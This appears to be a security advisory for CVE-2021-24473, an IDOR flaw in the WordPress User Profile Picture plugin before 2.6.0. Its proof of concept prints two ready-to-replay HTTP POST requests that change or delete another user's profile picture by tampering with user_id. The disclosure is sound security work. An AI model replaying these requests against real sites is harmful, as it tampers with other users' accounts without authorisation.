User Profile Picture < 2.6.0 – Arbitrary User Picture Change/Deletion via IDOR | CVE 2021-24473

Description

The plugin was affected by an IDOR issue, allowing users with the upload_image capability (by default author and above) to change and delete the profile pictures of other users (including those with higher roles).

Proof of Concept

Use a proxy such as Burp Suite to capture the request made when change your own profile picture, then tamper with the user_id parameter to change someone's else picture

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 89
Connection: close
Cookie: [author+]

action=metronet_add_thumbnail&post_id=1105&user_id=1&thumbnail_id=544&_wpnonce=b0db44185f

Same thing can be done to remove the profile picture of any user:

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 75
Connection: close
Cookie: [author+]

action=metronet_remove_thumbnail&post_id=1105&user_id=1&_wpnonce=b0db44185f